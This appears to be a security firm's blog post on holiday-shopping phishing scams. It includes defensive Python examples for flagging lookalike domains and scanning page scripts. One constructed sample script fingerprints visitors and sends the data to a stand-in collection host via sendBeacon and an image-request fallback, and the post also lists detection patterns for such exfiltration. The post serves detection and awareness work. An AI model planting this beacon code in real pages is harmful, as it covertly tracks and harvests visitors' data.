The onset of Black Friday and Cyber Monday deals is something we all stay up for. Whether it’s discounted vacation travel packages, educational offers to polish up skills, or limited-time purchase deals, these sales are an opportunity to grab what you’ve been eyeing all year long. However, the rush to secure these deals before they sell out is a growing risk for buyers.
Cybercriminals are taking advantage of the holiday shopping craze, creating fake offers, running fake campaigns targeting popular brands, and tricking people into giving up their financial and personal information, which leads to identity theft and significant monetary loss.
To help shed light on this issue, researchers at Bolster have been examining the current trends and scams targeting shoppers this season. The findings give a detailed picture of how these scams work and, more importantly, how you can defend yourself from falling prey to them.
Trend Analysis
During the much-anticipated Black Friday and Cyber Monday sales, cybercriminals increasingly use popular holiday-themed phrases in domain names and website content to target unwary consumers. By examining trending phrases for October and November, Bolster researchers predicted notable increases in phishing activity as the month went on.
Phishing websites with terms like “black,” “Friday,” or both are predicted to increase by a startling 177% between October and the end of November, according to rendered text data. On the other hand, domain data for the same terms indicates a 77% anticipated increase. More alarmingly, it is predicted that phishing efforts utilizing phrases such as “black,” “Friday,” “deals,” or a combination of these will rise sharply—by 344% in displayed text and an astounding 552% in domains.
These figures highlight how urgent it is to raise awareness ahead of the upcoming holiday sale season. Customers need to be on guard, since phrases like “Black Friday deal,” “claim gift,” and “free gift card” are becoming popular lures in phishing attempts. The dramatic increase in phishing keywords shows how attackers take advantage of holiday shopping patterns to trick consumers, putting personally identifiable information (PII) at risk.
Anatomy of the Operations
Bolster’s researchers were able to hunt down multiple scam websites that mimicked legitimate brands, some of which are listed in the IOC table. Cybercriminals frequently register domain names that closely resemble those of well-known brands to deceive users.
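The two signals described above, holiday-themed keywords in hostnames and page text and brand-lookalike domains, can be turned into a simple triage check. The following is an example added here, not Bolster’s detection logic: the protected brand names, the allowlist of genuine domains, the sample hostnames and the sample page text are all constructed, and the keyword list is taken from the phrases the post reports. It goes slightly beyond the post by also normalizing common digit-for-letter substitutions (e.g. `examplest0re`) before matching.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Holiday-themed phrases the post reports as rising in phishing domains and page text.
HOLIDAY_TERMS = ("black friday", "cyber monday", "deal", "claim gift", "free gift card")

# Brands to protect and their genuine domains: hypothetical values for this example.
# In production the allowlist would also cover the brands' own subdomains.
PROTECTED_BRANDS = ("examplestore", "shopbrand")
LEGIT_DOMAINS = {"examplestore.com", "shopbrand.com"}

# Digit-for-letter substitutions common in lookalike hostnames (0->o, 1->l, 3->e, 4->a, 5->s, 7->t).
LEET = str.maketrans("013457", "oleast")


def keyword_hits(text, squeeze=False):
    """Return the holiday phrases found in text.

    squeeze=True is for hostnames, where separators are often absent ("blackfridaydeals")
    and digits may stand in for letters. Plain mode is for rendered page text and uses
    word boundaries, so "deal" does not match "dealer".
    """
    if squeeze:
        norm = re.sub(r"[^a-z0-9]", "", text.lower().translate(LEET))
        return [t for t in HOLIDAY_TERMS if t.replace(" ", "") in norm]
    norm = re.sub(r"[^a-z0-9]+", " ", text.lower())
    return [t for t in HOLIDAY_TERMS if re.search(rf"\b{re.escape(t)}\b", norm)]


def lookalike_brand(host):
    """Return the protected brand a hostname imitates, or None.

    Catches the brand embedded in the host ("examplestore-black-friday.shop") and
    near-misses by edit similarity ("exampelstore").
    """
    labels = host.lower().split(".")[:-1]  # drop the TLD; a public-suffix list would be more robust
    joined = "-".join(labels).translate(LEET)
    squeezed = re.sub(r"[^a-z0-9]", "", joined)
    tokens = [t for t in re.split(r"[^a-z0-9]+", joined) if t]
    for brand in PROTECTED_BRANDS:
        if brand in squeezed:
            return brand
        if any(SequenceMatcher(None, brand, t).ratio() >= 0.85 for t in tokens):
            return brand
    return None


def classify(url_or_host):
    """Score one domain for holiday-phishing keywords and brand impersonation."""
    host = urlsplit(url_or_host if "://" in url_or_host else "//" + url_or_host).hostname or ""
    if host in LEGIT_DOMAINS:
        return {"host": host, "keywords": [], "brand": None, "score": 0, "verdict": "allowlisted"}
    keywords = keyword_hits(host, squeeze=True)
    brand = lookalike_brand(host)
    score = len(keywords) + (3 if brand else 0)  # impersonation weighs more than a lone keyword
    verdict = "suspicious" if score >= 2 else "benign"
    return {"host": host, "keywords": keywords, "brand": brand, "score": score, "verdict": verdict}


# Constructed sample inputs for this example (not real phishing domains or page text).
SAMPLE_DOMAINS = [
    "black-friday-deals-examplestore.shop",
    "https://examplest0re-cyber-monday.com/claim",
    "exampelstore-deals.net",
    "examplestore.com",
    "weather-forecast.org",
]
SAMPLE_TEXT = "Claim your FREE GIFT CARD now! Black Friday deal ends tonight."

if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        print(classify(d))
    print("text hits:", keyword_hits(SAMPLE_TEXT))
```

The score is deliberately coarse: a single holiday word on its own is common in legitimate retail domains, so it is not enough to flag a host, whereas any brand lookalike is flagged regardless of keywords.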
Analysis of the phishing websites
Poor grammar and spelling: Many phishing websites display incorrect or awkward grammar, which is a common indicator of fraud. One such indicator can be seen in the image below: “We Free Shipping Worldwide.”
Geolocation clues: Chinese-language text and Unicode escape sequences in the page source point to a possible connection to China or Mandarin-speaking regions.
CDN: External resources such as “https://cdn.staticsee.com”, found during the investigation, indicate the use of shared hosting infrastructure that may have been reused across multiple phishing campaigns. A Content Delivery Network (CDN) is a geographically distributed system of servers designed to optimize the delivery of web content. The use of CDNs by phishing operators illustrates the elaborate techniques used to mask malicious activity; it makes the attack infrastructure more flexible and harder to detect.
External URLs: References to external URLs for tracking the product, possibly using fake tracking-company links or order IDs.
Fraudulent platforms: Another red flag is the use of platforms such as Oemsaas and Oemapps, which have been linked to fraudulent activity. These platforms lure victims with deceptive promotions and charge money but never deliver the promised product.
Data harvesting: The JavaScript code collects various client-side data, such as the browser’s user-agent string, screen resolution, time zone, language, and referring URL. This data is stored in cookies to fingerprint the victim in the user’s context (e.g., language or screen size). It helps phishing kits tailor the attack by customizing it on a page-by-page basis and tracking user activity across future visits.
Data exfiltration: Collected data is sent to the remote server using methods such as navigator.sendBeacon or fallback methods (such as self.fireBeaconImg). sendBeacon is commonly used because it sends data asynchronously without interrupting the page unload, making it harder for the user to notice what data is being sent. If the main method fails, a fallback ensures the data is still transmitted, usually through a hidden image request or a similar mechanism.
Beacon Data exfiltration
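The harvesting and exfiltration behaviour described in the two points above leaves recognisable traces in page scripts: reads of fingerprinting properties, a cookie write, and a `sendBeacon` or image-request sender with a collection URL. The following static triage scanner is an example added here, not Bolster’s tooling or the kit’s code; the indicator patterns are written for this example, and the sample script and the `collector.example.invalid` hostname are constructed to mirror the behaviour the post describes. A regex scan like this will miss obfuscated scripts, so it is a first pass for analysts, not a verdict.

```python
import re

# Indicator patterns grouped by what they reveal. Written for this example: a coarse
# static triage, not a JavaScript parser, so obfuscated or minified kits may evade it.
PATTERNS = {
    "fingerprint": [
        ("navigator.userAgent", r"navigator\.userAgent"),
        ("navigator.language", r"navigator\.language"),
        ("screen dimensions", r"screen\.(width|height)"),
        ("time zone", r"resolvedOptions\(\)\.timeZone|getTimezoneOffset\("),
        ("document.referrer", r"document\.referrer"),
    ],
    "storage": [
        ("cookie write", r"document\.cookie\s*="),
    ],
    "exfil": [
        ("navigator.sendBeacon", r"navigator\.sendBeacon\s*\("),
        ("image beacon", r"new\s+Image\s*\(|\.src\s*=\s*[\"']https?://"),
        ("fetch keepalive", r"fetch\s*\([^)]*keepalive"),
        ("XMLHttpRequest", r"XMLHttpRequest"),
    ],
}
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def scan_script(js):
    """Return a list of {category, indicator, line} findings for one JavaScript source."""
    findings = []
    for lineno, line in enumerate(js.splitlines(), 1):
        for category, rules in PATTERNS.items():
            for name, pattern in rules:
                if re.search(pattern, line):
                    findings.append({"category": category, "indicator": name, "line": lineno})
    return findings


def exfil_endpoints(js):
    """Hostnames of absolute URLs in the script: candidate collection endpoints to block."""
    return sorted({m.group(1).lower() for m in URL_HOST.finditer(js)})


def assess(js):
    """Combine findings into a triage verdict."""
    findings = scan_script(js)
    counts = {c: sum(1 for f in findings if f["category"] == c) for c in PATTERNS}
    if counts["fingerprint"] >= 3 and counts["exfil"] >= 1:
        verdict = "fingerprint+exfil"  # reads several client attributes and has a way to send them out
    elif counts["exfil"] or counts["fingerprint"]:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "counts": counts, "findings": findings, "endpoints": exfil_endpoints(js)}


# Constructed sample modelled on the behaviour the post describes (not the kit's real code).
SAMPLE_KIT_JS = """
var fp = {
  ua: navigator.userAgent,
  lang: navigator.language,
  scr: screen.width + "x" + screen.height,
  tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
  ref: document.referrer
};
document.cookie = "_fp=" + btoa(JSON.stringify(fp)) + "; path=/";
var payload = JSON.stringify(fp);
if (!navigator.sendBeacon("https://collector.example.invalid/b", payload)) {
  self.fireBeaconImg = function () {
    var img = new Image();
    img.src = "https://collector.example.invalid/i.gif?d=" + encodeURIComponent(payload);
  };
  self.fireBeaconImg();
}
"""
# Constructed benign script for comparison.
SAMPLE_BENIGN_JS = 'var el = document.getElementById("greeting"); el.textContent = "Welcome back";'

if __name__ == "__main__":
    for label, src in (("kit", SAMPLE_KIT_JS), ("benign", SAMPLE_BENIGN_JS)):
        result = assess(src)
        print(label, result["verdict"], result["counts"], result["endpoints"])
```

The `endpoints` list is the actionable output: hostnames that appear as beacon or image targets can be added to the indicators fed to a proxy or DNS blocklist, while the per-line findings tell an analyst where to look in the script.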
Recommendations
- Beware of unsolicited emails and websites offering “too-good-to-be-true” deals.
- Verify that websites are legitimate by checking for a secure connection (HTTPS) and looking for other signs of authenticity.
- Do not click on suspicious links or provide personal information unless you are absolutely sure that the website is legitimate.
- Use URL scanning tools like CheckPhish to verify the legitimacy of the websites/domains before opening the webpage.
- Organizations should also invest in advanced security measures, such as multifactor authentication (MFA) and phishing detection software, to prevent users from falling prey to these scams.
- Awareness emails or messages should be sent to customers periodically to inform them of the organization’s legitimate websites, email addresses, and SMS numbers.
Conclusion
As the holiday shopping season approaches, cybercriminals increasingly exploit consumers’ appetite for deals. By understanding the trends, anatomy, and mechanisms of these frauds, consumers can better protect themselves and avoid becoming victims of identity theft and fraud. The key to reducing the risks of online shopping during the holiday season is increased awareness and vigilance.